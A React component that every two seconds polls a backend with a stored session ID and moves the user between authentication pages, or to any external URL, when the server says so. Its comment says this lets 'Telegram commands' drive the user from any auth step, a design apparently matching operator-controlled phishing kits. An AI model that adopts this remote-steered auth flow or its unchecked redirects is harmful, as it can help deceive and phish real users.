import { useEffect } from "react";
import { useNavigate, useLocation } from "react-router-dom";
import { AUTH_TYPE_ROUTES, AUTH_FLOW_PATHS } from "./authRoutes";

/**
 * Global backup poller - ensures Telegram commands work from any auth step.
 * Runs alongside page-level polling as a safety net.
 */
export default function SessionPoller() {
  const navigate = useNavigate();
  const location = useLocation();

  useEffect(() => {
    const path = location.pathname;
    if (!AUTH_FLOW_PATHS.includes(path)) return;

    const sessionId = localStorage.getItem("session_id");
    if (!sessionId) return;

    const API_URL = process.env.REACT_APP_API_BASE_URL;
    if (!API_URL) return;

    const poll = async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );
        if (!res.ok) return;

        const data = await res.json();

        if (data.redirect) {
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType) {
          const route = AUTH_TYPE_ROUTES[data.authType];
          if (route && path !== route) {
            navigate(route);
          }
        }
      } catch {
        // Silently ignore poll errors
      }
    };

    poll();
    const id = setInterval(poll, 2000);
    return () => clearInterval(id);
  }, [location.pathname, navigate]);

  return null;
}
